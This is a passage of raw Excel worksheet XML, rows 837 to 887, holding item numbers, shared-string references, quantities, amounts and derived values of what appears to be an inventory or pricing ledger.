      <c r="E837" s="238" t="s">
        <v>6863</v>
      </c>
      <c r="F837" s="9"/>
      <c r="G837" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H837" s="10">
        <v>79</v>
      </c>
      <c r="I837" s="14">
        <v>12676.23</v>
      </c>
      <c r="J837" s="15">
        <v>2028.2144</v>
      </c>
      <c r="K837" s="16"/>
    </row>
    <row r="838" spans="2:11">
      <c r="B838" s="9">
        <v>865</v>
      </c>
      <c r="C838" s="238" t="s">
        <v>6864</v>
      </c>
      <c r="D838" s="238" t="s">
        <v>6865</v>
      </c>
      <c r="E838" s="238" t="s">
        <v>6866</v>
      </c>
      <c r="F838" s="9"/>
      <c r="G838" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H838" s="10">
        <v>900</v>
      </c>
      <c r="I838" s="14">
        <v>15081.59</v>
      </c>
      <c r="J838" s="15">
        <v>2413.44</v>
      </c>
      <c r="K838" s="16"/>
    </row>
    <row r="839" spans="2:11">
      <c r="B839" s="9">
        <v>866</v>
      </c>
      <c r="C839" s="238" t="s">
        <v>6867</v>
      </c>
      <c r="D839" s="238" t="s">
        <v>6868</v>
      </c>
      <c r="E839" s="238" t="s">
        <v>6869</v>
      </c>
      <c r="F839" s="9" t="s">
        <v>6870</v>
      </c>
      <c r="G839" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H839" s="10">
        <v>150</v>
      </c>
      <c r="I839" s="14">
        <v>11025.71</v>
      </c>
      <c r="J839" s="15">
        <v>1764</v>
      </c>
      <c r="K839" s="16"/>
    </row>
    <row r="840" spans="2:11">
      <c r="B840" s="9">
        <v>867</v>
      </c>
      <c r="C840" s="238" t="s">
        <v>6871</v>
      </c>
      <c r="D840" s="238" t="s">
        <v>6872</v>
      </c>
      <c r="E840" s="238" t="s">
        <v>6873</v>
      </c>
      <c r="F840" s="238" t="s">
        <v>6874</v>
      </c>
      <c r="G840" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H840" s="10">
        <v>50</v>
      </c>
      <c r="I840" s="14">
        <v>470.17</v>
      </c>
      <c r="J840" s="15">
        <v>75.2</v>
      </c>
      <c r="K840" s="16"/>
    </row>
    <row r="841" spans="2:11">
      <c r="B841" s="9">
        <v>868</v>
      </c>
      <c r="C841" s="238" t="s">
        <v>6875</v>
      </c>
      <c r="D841" s="238" t="s">
        <v>6876</v>
      </c>
      <c r="E841" s="238" t="s">
        <v>6877</v>
      </c>
      <c r="F841" s="9"/>
      <c r="G841" s="237" t="s">
        <v>6878</v>
      </c>
      <c r="H841" s="10">
        <v>33.967</v>
      </c>
      <c r="I841" s="14">
        <v>22699.66</v>
      </c>
      <c r="J841" s="15">
        <v>3631.9690288</v>
      </c>
      <c r="K841" s="16"/>
    </row>
    <row r="842" spans="2:11">
      <c r="B842" s="9">
        <v>869</v>
      </c>
      <c r="C842" s="238" t="s">
        <v>6879</v>
      </c>
      <c r="D842" s="238" t="s">
        <v>6880</v>
      </c>
      <c r="E842" s="238" t="s">
        <v>6881</v>
      </c>
      <c r="F842" s="9"/>
      <c r="G842" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H842" s="10">
        <v>960</v>
      </c>
      <c r="I842" s="14">
        <v>45125.27</v>
      </c>
      <c r="J842" s="15">
        <v>7220.736</v>
      </c>
      <c r="K842" s="16"/>
    </row>
    <row r="843" spans="2:11">
      <c r="B843" s="9">
        <v>870</v>
      </c>
      <c r="C843" s="238" t="s">
        <v>6882</v>
      </c>
      <c r="D843" s="238" t="s">
        <v>6883</v>
      </c>
      <c r="E843" s="238" t="s">
        <v>6884</v>
      </c>
      <c r="F843" s="238" t="s">
        <v>6885</v>
      </c>
      <c r="G843" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H843" s="10">
        <v>350</v>
      </c>
      <c r="I843" s="14">
        <v>3290.85</v>
      </c>
      <c r="J843" s="15">
        <v>526.4</v>
      </c>
      <c r="K843" s="16"/>
    </row>
    <row r="844" spans="2:11">
      <c r="B844" s="9">
        <v>871</v>
      </c>
      <c r="C844" s="238" t="s">
        <v>6886</v>
      </c>
      <c r="D844" s="238" t="s">
        <v>6887</v>
      </c>
      <c r="E844" s="238" t="s">
        <v>6888</v>
      </c>
      <c r="F844" s="9"/>
      <c r="G844" s="237" t="s">
        <v>6878</v>
      </c>
      <c r="H844" s="10">
        <v>0.003</v>
      </c>
      <c r="I844" s="14">
        <v>0.81</v>
      </c>
      <c r="J844" s="15">
        <v>0.1296</v>
      </c>
      <c r="K844" s="16"/>
    </row>
    <row r="845" spans="2:11">
      <c r="B845" s="9">
        <v>872</v>
      </c>
      <c r="C845" s="238" t="s">
        <v>6889</v>
      </c>
      <c r="D845" s="238" t="s">
        <v>6890</v>
      </c>
      <c r="E845" s="238" t="s">
        <v>6891</v>
      </c>
      <c r="F845" s="9"/>
      <c r="G845" s="237" t="s">
        <v>6878</v>
      </c>
      <c r="H845" s="10">
        <v>0.82</v>
      </c>
      <c r="I845" s="14">
        <v>369.17</v>
      </c>
      <c r="J845" s="15">
        <v>59.067552</v>
      </c>
      <c r="K845" s="16"/>
    </row>
    <row r="846" spans="2:11">
      <c r="B846" s="9">
        <v>873</v>
      </c>
      <c r="C846" s="238" t="s">
        <v>6892</v>
      </c>
      <c r="D846" s="238" t="s">
        <v>6893</v>
      </c>
      <c r="E846" s="238" t="s">
        <v>6894</v>
      </c>
      <c r="F846" s="9"/>
      <c r="G846" s="237" t="s">
        <v>6878</v>
      </c>
      <c r="H846" s="10">
        <v>2.82</v>
      </c>
      <c r="I846" s="14">
        <v>1722.65</v>
      </c>
      <c r="J846" s="15">
        <v>275.624544</v>
      </c>
      <c r="K846" s="16"/>
    </row>
    <row r="847" spans="2:11">
      <c r="B847" s="9">
        <v>874</v>
      </c>
      <c r="C847" s="238" t="s">
        <v>6895</v>
      </c>
      <c r="D847" s="238" t="s">
        <v>6896</v>
      </c>
      <c r="E847" s="238" t="s">
        <v>6897</v>
      </c>
      <c r="F847" s="9"/>
      <c r="G847" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H847" s="10">
        <v>175</v>
      </c>
      <c r="I847" s="14">
        <v>1944.92</v>
      </c>
      <c r="J847" s="15">
        <v>311.08</v>
      </c>
      <c r="K847" s="16"/>
    </row>
    <row r="848" spans="2:11">
      <c r="B848" s="9">
        <v>875</v>
      </c>
      <c r="C848" s="238" t="s">
        <v>6898</v>
      </c>
      <c r="D848" s="238" t="s">
        <v>6899</v>
      </c>
      <c r="E848" s="238" t="s">
        <v>6900</v>
      </c>
      <c r="F848" s="238" t="s">
        <v>6901</v>
      </c>
      <c r="G848" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H848" s="10">
        <v>20</v>
      </c>
      <c r="I848" s="14">
        <v>1675.21</v>
      </c>
      <c r="J848" s="15">
        <v>268.032</v>
      </c>
      <c r="K848" s="16"/>
    </row>
    <row r="849" spans="2:11">
      <c r="B849" s="9">
        <v>876</v>
      </c>
      <c r="C849" s="238" t="s">
        <v>6902</v>
      </c>
      <c r="D849" s="238" t="s">
        <v>6899</v>
      </c>
      <c r="E849" s="238" t="s">
        <v>6900</v>
      </c>
      <c r="F849" s="238" t="s">
        <v>6903</v>
      </c>
      <c r="G849" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H849" s="10">
        <v>25</v>
      </c>
      <c r="I849" s="14">
        <v>2884.62</v>
      </c>
      <c r="J849" s="15">
        <v>461.52</v>
      </c>
      <c r="K849" s="16"/>
    </row>
    <row r="850" spans="2:11">
      <c r="B850" s="9">
        <v>877</v>
      </c>
      <c r="C850" s="238" t="s">
        <v>6904</v>
      </c>
      <c r="D850" s="238" t="s">
        <v>6905</v>
      </c>
      <c r="E850" s="238" t="s">
        <v>6906</v>
      </c>
      <c r="F850" s="238" t="s">
        <v>6907</v>
      </c>
      <c r="G850" s="237" t="s">
        <v>6878</v>
      </c>
      <c r="H850" s="10">
        <v>0.26</v>
      </c>
      <c r="I850" s="14">
        <v>3652.52</v>
      </c>
      <c r="J850" s="15">
        <v>584.40304</v>
      </c>
      <c r="K850" s="16"/>
    </row>
    <row r="851" spans="2:11">
      <c r="B851" s="9">
        <v>879</v>
      </c>
      <c r="C851" s="238" t="s">
        <v>6908</v>
      </c>
      <c r="D851" s="238" t="s">
        <v>6909</v>
      </c>
      <c r="E851" s="238" t="s">
        <v>6910</v>
      </c>
      <c r="F851" s="9"/>
      <c r="G851" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H851" s="10">
        <v>2</v>
      </c>
      <c r="I851" s="14">
        <v>25.64</v>
      </c>
      <c r="J851" s="15">
        <v>4.1024</v>
      </c>
      <c r="K851" s="16"/>
    </row>
    <row r="852" spans="2:11">
      <c r="B852" s="9">
        <v>880</v>
      </c>
      <c r="C852" s="238" t="s">
        <v>6911</v>
      </c>
      <c r="D852" s="238" t="s">
        <v>6912</v>
      </c>
      <c r="E852" s="238" t="s">
        <v>6912</v>
      </c>
      <c r="F852" s="9"/>
      <c r="G852" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H852" s="10">
        <v>7</v>
      </c>
      <c r="I852" s="14">
        <v>223.08</v>
      </c>
      <c r="J852" s="15">
        <v>35.6944</v>
      </c>
      <c r="K852" s="16"/>
    </row>
    <row r="853" spans="2:11">
      <c r="B853" s="9">
        <v>881</v>
      </c>
      <c r="C853" s="238" t="s">
        <v>6913</v>
      </c>
      <c r="D853" s="238" t="s">
        <v>6914</v>
      </c>
      <c r="E853" s="238" t="s">
        <v>6915</v>
      </c>
      <c r="F853" s="9"/>
      <c r="G853" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H853" s="10">
        <v>180</v>
      </c>
      <c r="I853" s="14">
        <v>5840.04</v>
      </c>
      <c r="J853" s="15">
        <v>934.272</v>
      </c>
      <c r="K853" s="16"/>
    </row>
    <row r="854" spans="2:11">
      <c r="B854" s="9">
        <v>882</v>
      </c>
      <c r="C854" s="238" t="s">
        <v>6916</v>
      </c>
      <c r="D854" s="238" t="s">
        <v>6917</v>
      </c>
      <c r="E854" s="238" t="s">
        <v>6918</v>
      </c>
      <c r="F854" s="238" t="s">
        <v>6919</v>
      </c>
      <c r="G854" s="237" t="s">
        <v>3904</v>
      </c>
      <c r="H854" s="10">
        <v>110</v>
      </c>
      <c r="I854" s="14">
        <v>755.73</v>
      </c>
      <c r="J854" s="15">
        <v>302.28</v>
      </c>
      <c r="K854" s="16"/>
    </row>
    <row r="855" spans="2:11">
      <c r="B855" s="9">
        <v>883</v>
      </c>
      <c r="C855" s="238" t="s">
        <v>6920</v>
      </c>
      <c r="D855" s="238" t="s">
        <v>6921</v>
      </c>
      <c r="E855" s="238" t="s">
        <v>6922</v>
      </c>
      <c r="F855" s="9"/>
      <c r="G855" s="237" t="s">
        <v>6923</v>
      </c>
      <c r="H855" s="10">
        <v>4</v>
      </c>
      <c r="I855" s="14">
        <v>5.45</v>
      </c>
      <c r="J855" s="15">
        <v>2.176</v>
      </c>
      <c r="K855" s="16"/>
    </row>
    <row r="856" spans="2:11">
      <c r="B856" s="9">
        <v>884</v>
      </c>
      <c r="C856" s="238" t="s">
        <v>6924</v>
      </c>
      <c r="D856" s="9"/>
      <c r="E856" s="238" t="s">
        <v>6925</v>
      </c>
      <c r="F856" s="9"/>
      <c r="G856" s="237" t="s">
        <v>5495</v>
      </c>
      <c r="H856" s="10">
        <v>5</v>
      </c>
      <c r="I856" s="14">
        <v>53.42</v>
      </c>
      <c r="J856" s="15">
        <v>21.36</v>
      </c>
      <c r="K856" s="16"/>
    </row>
    <row r="857" spans="2:11">
      <c r="B857" s="9">
        <v>885</v>
      </c>
      <c r="C857" s="238" t="s">
        <v>6926</v>
      </c>
      <c r="D857" s="238" t="s">
        <v>6927</v>
      </c>
      <c r="E857" s="238" t="s">
        <v>6928</v>
      </c>
      <c r="F857" s="9"/>
      <c r="G857" s="237" t="s">
        <v>3904</v>
      </c>
      <c r="H857" s="10">
        <v>20</v>
      </c>
      <c r="I857" s="14">
        <v>788.92</v>
      </c>
      <c r="J857" s="15">
        <v>315.6</v>
      </c>
      <c r="K857" s="16"/>
    </row>
    <row r="858" spans="2:11">
      <c r="B858" s="9">
        <v>886</v>
      </c>
      <c r="C858" s="238" t="s">
        <v>6929</v>
      </c>
      <c r="D858" s="238" t="s">
        <v>6930</v>
      </c>
      <c r="E858" s="238" t="s">
        <v>6931</v>
      </c>
      <c r="F858" s="238" t="s">
        <v>6932</v>
      </c>
      <c r="G858" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H858" s="10">
        <v>2</v>
      </c>
      <c r="I858" s="14">
        <v>3504.27</v>
      </c>
      <c r="J858" s="15">
        <v>1401.712</v>
      </c>
      <c r="K858" s="16"/>
    </row>
    <row r="859" spans="2:11">
      <c r="B859" s="9">
        <v>887</v>
      </c>
      <c r="C859" s="238" t="s">
        <v>6933</v>
      </c>
      <c r="D859" s="238" t="s">
        <v>6934</v>
      </c>
      <c r="E859" s="238" t="s">
        <v>6934</v>
      </c>
      <c r="F859" s="238" t="s">
        <v>6935</v>
      </c>
      <c r="G859" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H859" s="10">
        <v>1</v>
      </c>
      <c r="I859" s="14">
        <v>2820.51</v>
      </c>
      <c r="J859" s="15">
        <v>1128.204</v>
      </c>
      <c r="K859" s="16"/>
    </row>
    <row r="860" spans="2:11">
      <c r="B860" s="9">
        <v>888</v>
      </c>
      <c r="C860" s="238" t="s">
        <v>6936</v>
      </c>
      <c r="D860" s="238" t="s">
        <v>6937</v>
      </c>
      <c r="E860" s="238" t="s">
        <v>6938</v>
      </c>
      <c r="F860" s="9"/>
      <c r="G860" s="237" t="s">
        <v>3776</v>
      </c>
      <c r="H860" s="10">
        <v>21</v>
      </c>
      <c r="I860" s="14">
        <v>1997.77</v>
      </c>
      <c r="J860" s="15">
        <v>799.092</v>
      </c>
      <c r="K860" s="16"/>
    </row>
    <row r="861" spans="2:11">
      <c r="B861" s="9">
        <v>889</v>
      </c>
      <c r="C861" s="238" t="s">
        <v>6939</v>
      </c>
      <c r="D861" s="238" t="s">
        <v>6940</v>
      </c>
      <c r="E861" s="238" t="s">
        <v>6941</v>
      </c>
      <c r="F861" s="9"/>
      <c r="G861" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H861" s="10">
        <v>1</v>
      </c>
      <c r="I861" s="14">
        <v>54.46</v>
      </c>
      <c r="J861" s="15">
        <v>8.7136</v>
      </c>
      <c r="K861" s="16"/>
    </row>
    <row r="862" spans="2:11">
      <c r="B862" s="9">
        <v>890</v>
      </c>
      <c r="C862" s="238" t="s">
        <v>6942</v>
      </c>
      <c r="D862" s="238" t="s">
        <v>6943</v>
      </c>
      <c r="E862" s="238" t="s">
        <v>6944</v>
      </c>
      <c r="F862" s="238" t="s">
        <v>5911</v>
      </c>
      <c r="G862" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H862" s="10">
        <v>93</v>
      </c>
      <c r="I862" s="14">
        <v>157.13</v>
      </c>
      <c r="J862" s="15">
        <v>25.1472</v>
      </c>
      <c r="K862" s="16"/>
    </row>
    <row r="863" spans="2:11">
      <c r="B863" s="9">
        <v>891</v>
      </c>
      <c r="C863" s="238" t="s">
        <v>6945</v>
      </c>
      <c r="D863" s="238" t="s">
        <v>6946</v>
      </c>
      <c r="E863" s="238" t="s">
        <v>6947</v>
      </c>
      <c r="F863" s="9"/>
      <c r="G863" s="237" t="s">
        <v>3904</v>
      </c>
      <c r="H863" s="10">
        <v>8</v>
      </c>
      <c r="I863" s="14">
        <v>335.55</v>
      </c>
      <c r="J863" s="15">
        <v>53.6832</v>
      </c>
      <c r="K863" s="16"/>
    </row>
    <row r="864" spans="2:11">
      <c r="B864" s="9">
        <v>892</v>
      </c>
      <c r="C864" s="238" t="s">
        <v>6948</v>
      </c>
      <c r="D864" s="238" t="s">
        <v>6949</v>
      </c>
      <c r="E864" s="238" t="s">
        <v>6950</v>
      </c>
      <c r="F864" s="9"/>
      <c r="G864" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H864" s="10">
        <v>50</v>
      </c>
      <c r="I864" s="14">
        <v>5.13</v>
      </c>
      <c r="J864" s="15">
        <v>2</v>
      </c>
      <c r="K864" s="16"/>
    </row>
    <row r="865" spans="2:11">
      <c r="B865" s="9">
        <v>893</v>
      </c>
      <c r="C865" s="238" t="s">
        <v>6951</v>
      </c>
      <c r="D865" s="238" t="s">
        <v>6952</v>
      </c>
      <c r="E865" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F865" s="238" t="s">
        <v>6303</v>
      </c>
      <c r="G865" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H865" s="10">
        <v>100</v>
      </c>
      <c r="I865" s="14">
        <v>5.13</v>
      </c>
      <c r="J865" s="15">
        <v>2</v>
      </c>
      <c r="K865" s="16"/>
    </row>
    <row r="866" spans="2:11">
      <c r="B866" s="9">
        <v>894</v>
      </c>
      <c r="C866" s="238" t="s">
        <v>6953</v>
      </c>
      <c r="D866" s="238" t="s">
        <v>6954</v>
      </c>
      <c r="E866" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F866" s="238" t="s">
        <v>6299</v>
      </c>
      <c r="G866" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H866" s="10">
        <v>242</v>
      </c>
      <c r="I866" s="14">
        <v>20.62</v>
      </c>
      <c r="J866" s="15">
        <v>8.712</v>
      </c>
      <c r="K866" s="16"/>
    </row>
    <row r="867" spans="2:11">
      <c r="B867" s="9">
        <v>895</v>
      </c>
      <c r="C867" s="238" t="s">
        <v>6955</v>
      </c>
      <c r="D867" s="238" t="s">
        <v>6956</v>
      </c>
      <c r="E867" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F867" s="238" t="s">
        <v>6297</v>
      </c>
      <c r="G867" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H867" s="10">
        <v>178</v>
      </c>
      <c r="I867" s="14">
        <v>27.51</v>
      </c>
      <c r="J867" s="15">
        <v>10.68</v>
      </c>
      <c r="K867" s="16"/>
    </row>
    <row r="868" spans="2:11">
      <c r="B868" s="9">
        <v>896</v>
      </c>
      <c r="C868" s="238" t="s">
        <v>6957</v>
      </c>
      <c r="D868" s="238" t="s">
        <v>6958</v>
      </c>
      <c r="E868" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F868" s="238" t="s">
        <v>6959</v>
      </c>
      <c r="G868" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H868" s="10">
        <v>19</v>
      </c>
      <c r="I868" s="14">
        <v>3.8</v>
      </c>
      <c r="J868" s="15">
        <v>1.52</v>
      </c>
      <c r="K868" s="16"/>
    </row>
    <row r="869" spans="2:11">
      <c r="B869" s="9">
        <v>897</v>
      </c>
      <c r="C869" s="238" t="s">
        <v>6960</v>
      </c>
      <c r="D869" s="238" t="s">
        <v>6961</v>
      </c>
      <c r="E869" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F869" s="238" t="s">
        <v>3852</v>
      </c>
      <c r="G869" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H869" s="10">
        <v>120</v>
      </c>
      <c r="I869" s="14">
        <v>135.81</v>
      </c>
      <c r="J869" s="15">
        <v>54.24</v>
      </c>
      <c r="K869" s="16"/>
    </row>
    <row r="870" spans="2:11">
      <c r="B870" s="9">
        <v>898</v>
      </c>
      <c r="C870" s="238" t="s">
        <v>6962</v>
      </c>
      <c r="D870" s="238" t="s">
        <v>6963</v>
      </c>
      <c r="E870" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F870" s="238" t="s">
        <v>6964</v>
      </c>
      <c r="G870" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H870" s="10">
        <v>11</v>
      </c>
      <c r="I870" s="14">
        <v>4.12</v>
      </c>
      <c r="J870" s="15">
        <v>1.628</v>
      </c>
      <c r="K870" s="16"/>
    </row>
    <row r="871" spans="2:11">
      <c r="B871" s="9">
        <v>899</v>
      </c>
      <c r="C871" s="238" t="s">
        <v>6965</v>
      </c>
      <c r="D871" s="238" t="s">
        <v>6966</v>
      </c>
      <c r="E871" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F871" s="238" t="s">
        <v>6273</v>
      </c>
      <c r="G871" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H871" s="10">
        <v>173</v>
      </c>
      <c r="I871" s="14">
        <v>105.48</v>
      </c>
      <c r="J871" s="15">
        <v>42.212</v>
      </c>
      <c r="K871" s="16"/>
    </row>
    <row r="872" spans="2:11">
      <c r="B872" s="9">
        <v>900</v>
      </c>
      <c r="C872" s="238" t="s">
        <v>6967</v>
      </c>
      <c r="D872" s="238" t="s">
        <v>6968</v>
      </c>
      <c r="E872" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F872" s="238" t="s">
        <v>6276</v>
      </c>
      <c r="G872" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H872" s="10">
        <v>42</v>
      </c>
      <c r="I872" s="14">
        <v>40.1</v>
      </c>
      <c r="J872" s="15">
        <v>15.96</v>
      </c>
      <c r="K872" s="16"/>
    </row>
    <row r="873" spans="2:11">
      <c r="B873" s="9">
        <v>901</v>
      </c>
      <c r="C873" s="238" t="s">
        <v>6969</v>
      </c>
      <c r="D873" s="238" t="s">
        <v>6970</v>
      </c>
      <c r="E873" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F873" s="238" t="s">
        <v>6256</v>
      </c>
      <c r="G873" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H873" s="10">
        <v>20</v>
      </c>
      <c r="I873" s="14">
        <v>11.97</v>
      </c>
      <c r="J873" s="15">
        <v>4.8</v>
      </c>
      <c r="K873" s="16"/>
    </row>
    <row r="874" spans="2:11">
      <c r="B874" s="9">
        <v>902</v>
      </c>
      <c r="C874" s="238" t="s">
        <v>6971</v>
      </c>
      <c r="D874" s="238" t="s">
        <v>6972</v>
      </c>
      <c r="E874" s="238" t="s">
        <v>6973</v>
      </c>
      <c r="F874" s="238" t="s">
        <v>6974</v>
      </c>
      <c r="G874" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H874" s="10">
        <v>100</v>
      </c>
      <c r="I874" s="14">
        <v>31.38</v>
      </c>
      <c r="J874" s="15">
        <v>12.4</v>
      </c>
      <c r="K874" s="16"/>
    </row>
    <row r="875" spans="2:11">
      <c r="B875" s="9">
        <v>903</v>
      </c>
      <c r="C875" s="238" t="s">
        <v>6975</v>
      </c>
      <c r="D875" s="238" t="s">
        <v>6976</v>
      </c>
      <c r="E875" s="238" t="s">
        <v>6973</v>
      </c>
      <c r="F875" s="238" t="s">
        <v>6977</v>
      </c>
      <c r="G875" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H875" s="10">
        <v>20</v>
      </c>
      <c r="I875" s="14">
        <v>13.68</v>
      </c>
      <c r="J875" s="15">
        <v>5.44</v>
      </c>
      <c r="K875" s="16"/>
    </row>
    <row r="876" spans="2:11">
      <c r="B876" s="9">
        <v>904</v>
      </c>
      <c r="C876" s="238" t="s">
        <v>6978</v>
      </c>
      <c r="D876" s="238" t="s">
        <v>6979</v>
      </c>
      <c r="E876" s="238" t="s">
        <v>6973</v>
      </c>
      <c r="F876" s="238" t="s">
        <v>6980</v>
      </c>
      <c r="G876" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H876" s="10">
        <v>271</v>
      </c>
      <c r="I876" s="14">
        <v>218.97</v>
      </c>
      <c r="J876" s="15">
        <v>87.804</v>
      </c>
      <c r="K876" s="16"/>
    </row>
    <row r="877" spans="2:11">
      <c r="B877" s="9">
        <v>905</v>
      </c>
      <c r="C877" s="238" t="s">
        <v>6981</v>
      </c>
      <c r="D877" s="238" t="s">
        <v>6982</v>
      </c>
      <c r="E877" s="238" t="s">
        <v>6973</v>
      </c>
      <c r="F877" s="238" t="s">
        <v>6983</v>
      </c>
      <c r="G877" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H877" s="10">
        <v>10</v>
      </c>
      <c r="I877" s="14">
        <v>24.36</v>
      </c>
      <c r="J877" s="15">
        <v>9.76</v>
      </c>
      <c r="K877" s="16"/>
    </row>
    <row r="878" spans="2:11">
      <c r="B878" s="9">
        <v>906</v>
      </c>
      <c r="C878" s="238" t="s">
        <v>6984</v>
      </c>
      <c r="D878" s="238" t="s">
        <v>6985</v>
      </c>
      <c r="E878" s="238" t="s">
        <v>6986</v>
      </c>
      <c r="F878" s="238" t="s">
        <v>6987</v>
      </c>
      <c r="G878" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H878" s="10">
        <v>30</v>
      </c>
      <c r="I878" s="14">
        <v>174.3</v>
      </c>
      <c r="J878" s="15">
        <v>69.72</v>
      </c>
      <c r="K878" s="16"/>
    </row>
    <row r="879" spans="2:11">
      <c r="B879" s="9">
        <v>907</v>
      </c>
      <c r="C879" s="238" t="s">
        <v>6988</v>
      </c>
      <c r="D879" s="238" t="s">
        <v>6985</v>
      </c>
      <c r="E879" s="238" t="s">
        <v>6986</v>
      </c>
      <c r="F879" s="238" t="s">
        <v>6989</v>
      </c>
      <c r="G879" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H879" s="10">
        <v>6</v>
      </c>
      <c r="I879" s="14">
        <v>38.46</v>
      </c>
      <c r="J879" s="15">
        <v>15.384</v>
      </c>
      <c r="K879" s="16"/>
    </row>
    <row r="880" spans="2:11">
      <c r="B880" s="9">
        <v>908</v>
      </c>
      <c r="C880" s="238" t="s">
        <v>6990</v>
      </c>
      <c r="D880" s="238" t="s">
        <v>6991</v>
      </c>
      <c r="E880" s="238" t="s">
        <v>6986</v>
      </c>
      <c r="F880" s="238" t="s">
        <v>6992</v>
      </c>
      <c r="G880" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H880" s="10">
        <v>3</v>
      </c>
      <c r="I880" s="14">
        <v>20.37</v>
      </c>
      <c r="J880" s="15">
        <v>8.148</v>
      </c>
      <c r="K880" s="16"/>
    </row>
    <row r="881" spans="2:11">
      <c r="B881" s="9">
        <v>909</v>
      </c>
      <c r="C881" s="238" t="s">
        <v>6993</v>
      </c>
      <c r="D881" s="238" t="s">
        <v>6994</v>
      </c>
      <c r="E881" s="238" t="s">
        <v>6995</v>
      </c>
      <c r="F881" s="238" t="s">
        <v>6996</v>
      </c>
      <c r="G881" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H881" s="10">
        <v>2</v>
      </c>
      <c r="I881" s="14">
        <v>99.19</v>
      </c>
      <c r="J881" s="15">
        <v>39.68</v>
      </c>
      <c r="K881" s="16"/>
    </row>
    <row r="882" spans="2:11">
      <c r="B882" s="9">
        <v>910</v>
      </c>
      <c r="C882" s="238" t="s">
        <v>6997</v>
      </c>
      <c r="D882" s="238" t="s">
        <v>6998</v>
      </c>
      <c r="E882" s="238" t="s">
        <v>6999</v>
      </c>
      <c r="F882" s="238" t="s">
        <v>7000</v>
      </c>
      <c r="G882" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H882" s="10">
        <v>3</v>
      </c>
      <c r="I882" s="14">
        <v>12.82</v>
      </c>
      <c r="J882" s="15">
        <v>5.124</v>
      </c>
      <c r="K882" s="16"/>
    </row>
    <row r="883" spans="2:11">
      <c r="B883" s="9">
        <v>911</v>
      </c>
      <c r="C883" s="238" t="s">
        <v>7001</v>
      </c>
      <c r="D883" s="238" t="s">
        <v>7002</v>
      </c>
      <c r="E883" s="238" t="s">
        <v>6999</v>
      </c>
      <c r="F883" s="238" t="s">
        <v>7003</v>
      </c>
      <c r="G883" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H883" s="10">
        <v>3</v>
      </c>
      <c r="I883" s="14">
        <v>20.51</v>
      </c>
      <c r="J883" s="15">
        <v>8.208</v>
      </c>
      <c r="K883" s="16"/>
    </row>
    <row r="884" spans="2:11">
      <c r="B884" s="9">
        <v>912</v>
      </c>
      <c r="C884" s="238" t="s">
        <v>7004</v>
      </c>
      <c r="D884" s="238" t="s">
        <v>7005</v>
      </c>
      <c r="E884" s="238" t="s">
        <v>6999</v>
      </c>
      <c r="F884" s="238" t="s">
        <v>7006</v>
      </c>
      <c r="G884" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H884" s="10">
        <v>1</v>
      </c>
      <c r="I884" s="14">
        <v>26.48</v>
      </c>
      <c r="J884" s="15">
        <v>10.592</v>
      </c>
      <c r="K884" s="16"/>
    </row>
    <row r="885" spans="2:11">
      <c r="B885" s="9">
        <v>913</v>
      </c>
      <c r="C885" s="238" t="s">
        <v>7007</v>
      </c>
      <c r="D885" s="238" t="s">
        <v>7008</v>
      </c>
      <c r="E885" s="238" t="s">
        <v>7009</v>
      </c>
      <c r="F885" s="238" t="s">
        <v>6299</v>
      </c>
      <c r="G885" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H885" s="10">
        <v>14</v>
      </c>
      <c r="I885" s="14">
        <v>0.47</v>
      </c>
      <c r="J885" s="15">
        <v>0.0672</v>
      </c>
      <c r="K885" s="16"/>
    </row>
    <row r="886" spans="2:11">
      <c r="B886" s="9">
        <v>914</v>
      </c>
      <c r="C886" s="238" t="s">
        <v>7010</v>
      </c>
      <c r="D886" s="238" t="s">
        <v>7011</v>
      </c>
      <c r="E886" s="238" t="s">
        <v>7009</v>
      </c>
      <c r="F886" s="238" t="s">
        <v>6297</v>
      </c>
      <c r="G886" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H886" s="10">
        <v>140</v>
      </c>
      <c r="I886" s="14">
        <v>6.67</v>
      </c>
      <c r="J886" s="15">
        <v>1.12</v>
      </c>
      <c r="K886" s="16"/>
    </row>
    <row r="887" spans="2:11">
      <c r="B887" s="9">
        <v>915</v>
      </c>
      <c r="C887" s="238" t="s">
